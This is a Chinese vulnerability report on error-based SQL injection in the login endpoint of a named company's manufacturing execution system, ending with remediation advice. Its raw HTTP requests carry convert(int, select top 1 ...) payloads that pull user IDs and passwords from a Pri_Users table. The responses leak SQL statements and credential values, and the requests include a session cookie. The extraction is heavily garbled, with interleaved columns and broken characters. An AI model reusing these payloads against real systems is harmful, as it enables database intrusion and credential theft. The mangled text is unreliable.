文本内容:
系统名称制造执行系统系统地址URL漏洞详情:在输入数据后进行注入测试返回报错信息以及语句sql sqlRequest754c\u9762*,data[{user_id:l,,serpassword”:T,kczz*:*\u67f3\u5dde\U0UU3\ll89rf}userid=lPrettyRawHex三\n三Response1POST/comresource/rh/Login.ashx HTTP/
1.1PrettyRawHexRender m\n三2Host:hxmi s.sgmw.com.cn3User-Agent:Mozilla/
5.0Windows NT
10.0;Win64;x64;rv:
109.01HTTP/
1.1200OKGecko/20100101Firefox/
115.02Cache-Controlprivate4Accept*/*3Content-Type:text/plain;charset=utf-84Vary:Accept-Encoding5Accept-Language:zh-CN,zh;q=
0.8,zh-TW;q=
0.7,zh-HK;q=
0.5,en-US;5Server:Microsoft-IIS/
10.0q=
0.3,en;q=
0.26X-AspNet-Version:
2.
0.507276Accept-Encoding:gzip,deflate7X-Powered-ByASP.NET7Content-Type:application/x-www-form-urlencoded;charset=UTF-88Date:Tue,15Oct202408:49:57GMT8X-Requested-Wi thXMLHttpRequest9Connection:close9Content-Length:21810Content-Length:34510Origin:.sgmw.com.cn1111Connection:close12{ZMResult:{Message[Microsoft][ODBC Driver18for SQL Server][SQL12Referer:s.sgmw.com.cn/1oadPage/login,html Server]MQ附近有语法错误[Microsoft][ODBC Driver18for SQL13Cookie:ASP.NET_Sessionld=kmnqcq55xnljhq45om2wla55Server][SQL SaYvavl空彷出后的己I县不串蚣nnnRr^-Ilnahl atn14execute statement,SQLselect*from Pri_Users whereuser_id=115funName二and userpassword=M0ZMBASE.Md_CDQX.Cp_CDQX_YHGL.IF_CDQX_YHGL.login params=MQ==,Type:Error,Command:}}{“operModule•”\ii4,Rh\ii9N
75.cnar吗口艮”:〃\u76「b\u5f55\u存在报错注入:Request data:{user_id:adminand+1=convertint,select top1user_id fromPrettyRawHexPri_Users+where+user_id!^i3d Zmsupport*^-—userpass word:22,1POST/comresource/rh/Login.ashx HTTP/
1.1kczz”:*\u67f3\u5dde\u6cb3\u897f*}}userid=a dmin,+convertint,2Host:hxmis.sgmw.com.cndb_name%3b|3User-Agent:Mozilla/
5.0Windows NT
10.0;Win64x64;rv:
109.0ResponseGecko/20100101Firefox/
115.04Accept:*/*PrettyRawHexRender\n=5Accept-Language:1HTTP/
1.1200OKzh-CN,zh;q=
0.8,zh-TWq=
0.7,zh-HKq=
0.5,en-US;q=
0.3,en;2Cache-Control:privateq=
0.23Content-Type:text/plain;charset=utf-86Accept-Encoding:gzip,deflate4VaryAccept-Encoding7Content-Type:application/x-^wform-urlencoded;5Server:Microsoft_IIS/
10.0charset=UTF-86X-AspNet-Version:
2.
0.507278X-Requested-With:XMLHttpRequest7X-Powered-By:ASP.NET保口9Content-Length:3448Date:Tue,15Oct202408:51:22GMT10Origin:http://hxmis.sgmw.com.cn9Connection:close.1Connectionclose10Content-Length:377/2Referer:.sgmw.com.cn/loadPage/login.html13Cookie:ASP.NET_SessionId=knrnqcq55xnljhq45om2wla5512{“ZMResult:{Message:[Microsoft]《加J8for SQLServer][SQL114Server]在将varchar]值yl32转换成数据类型int时失败QODBC35funName二cute statement,SQLselect*from Pri_Users whereuser_idTllUblULUyAM0ZMBASE.Md_CDQX.Cp_CDQX_YHGL.IF_CDQX_YHGL.login params==J admin*and l=convertint,select top1user_id from Pri_Users where{operModule:\u4e3b\u985,operType:WTbu5f55\u754c\u9762*,user_id!=,Zmsupport1-and userpassword=Mjl=,Type:Error,Command:}}⑶fS-今Search...0matchesf3^-今Search…0matchesRequest db_name%3b|ResponsePrettyRawHex\n=PrettyRawHexRender E5\n三1POST/comresource/rh/Login.ashx HTTP/
1.12Host:hxmis.sgmw.com.cn1HTTP/
1.1200OK3User-Agent:Mozilla/
5.0Windows NT
10.0;Win64;x64;rv:
109.02Cache-Control:privateGecko/20100101Firefox/
115.03Content-Type:text/plain;charset=utf-84Accept:*/*4Vary:Accept-Encoding5Accept-Language:5Server:Microsoft-IIS/
10.0zh~CN,zh;q=
0.8,zh_TW;q=
0.7,zh-HK;q=
0.5,en-US;q=
0.3,en;q=
0.26X-AspNet-Version:
2.
0.507276Accept-Encoding:gzip,deflate7X-Powered-By:ASP.NET7Content-Type:application/x-u-u^-form-urlencoded;charset=UTF-88Date:Tue,15Oct202408:52:31GMT8X-Requested-WithXMLHttpRequest9Connection:close9Content-Length:34110Content-Length:38410Originhttp//hxmis.sgmw.com cn111Connection:close12{“ZMResult{Message[Microsoft]i iui1oa SQLServer]D ru r8H r2Refererhttp//hxmis.sgmw.com.cn/1oadPage/1ogin.html[SQLServer]在将varchareX15eX15eXk二’传换成数据类型int时失3Cookie:ASP.NET_SessionId=kmmqcq55xnljhq45om2wla55败Q0DBC3:UM®.e toexecute statement,SQL:select*from,4Pri_Use^Bjiere user_id=admin andl=convert int,select user5funName=pas swordM0ZMBASE.Md_CDQX.Cp_CDQX_YHGL.IF_CDQX_YHGL.login params=fromPri_Users whereuser_id=,yl32j^一and userpassword=Mjl=,,{“operModule:\u4e3b\u985,operType”:*\u767b\u5f55\u TypeCommand}}754c\u9762*,data:{user_id:adminand+l=convertint,select top1userpassword fromPri_Users+uThere+user_id=,yl32+—userpassword:22,密码kczz:\u67f3\u5dde\u6cb3\u89f}}userid:admin+co nvertint,该漏洞会导致数据库敏感数据泄露,有可能导致rce修复建议:.使用参数化查询1参数化查询使用占位符来代替查询中的值,当查询执行时,占位符将被替换为用户提供的SQL参数输入验证和清理
2.对所有用户输入进行验证和清理,确保输入的数据符合预期的格式和类型可以使用正则表达式来检查字符串中是否存在特殊字符或检查数值是否在有效范围内同时,对于特殊字符如单引号、双引号、分号,应进行转义处理,对于、等关键字,应进行过滤select addxp_cmdshell处理.使用应用防火墙3Web WAF通过分析传入流量并根据规则集阻止恶意请求,为应用程序提供额外的保护层。
个人认证
优秀文档
获得点赞 0
